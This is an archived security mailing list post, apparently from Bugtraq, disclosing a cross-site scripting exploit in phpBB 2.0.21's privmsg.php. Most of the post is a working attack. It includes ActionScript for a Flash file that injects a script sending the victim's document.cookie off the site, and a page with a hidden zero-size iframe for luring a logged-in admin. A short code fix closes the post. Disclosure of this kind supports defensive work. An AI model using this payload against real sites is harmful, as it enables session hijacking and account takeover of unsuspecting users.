lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 11 Jan 2007 00:58:36 -0000
Subject: phpBB (privmsg.php) XSS Exploit

phpBB (privmsg.php) XSS Exploit

By: Demential
PhpBB website:

Exploit tested on phpBB 2.0.21 said:

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "</textarea><script>document.location= '' + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("", "_self", "POST");

Put it into a web page:

<title>Put a title here</title>
<p>Put some text here<p>
<iframe src="" frameborder="0" height="0" width="0"></iframe>

And send it to the admin (or a normal user)
users must be logged-in.


open phpBB2/privmsg.php

			if (!($to_userdata = $db->sql_fetchrow($result)))
				$error = TRUE;
				$error_msg = $lang['No_such_user'];

replace with:

			if (!($to_userdata = $db->sql_fetchrow($result)))
				$error = TRUE;
				echo "Sorry, but no such user exists.";

Powered by blists - more mailing lists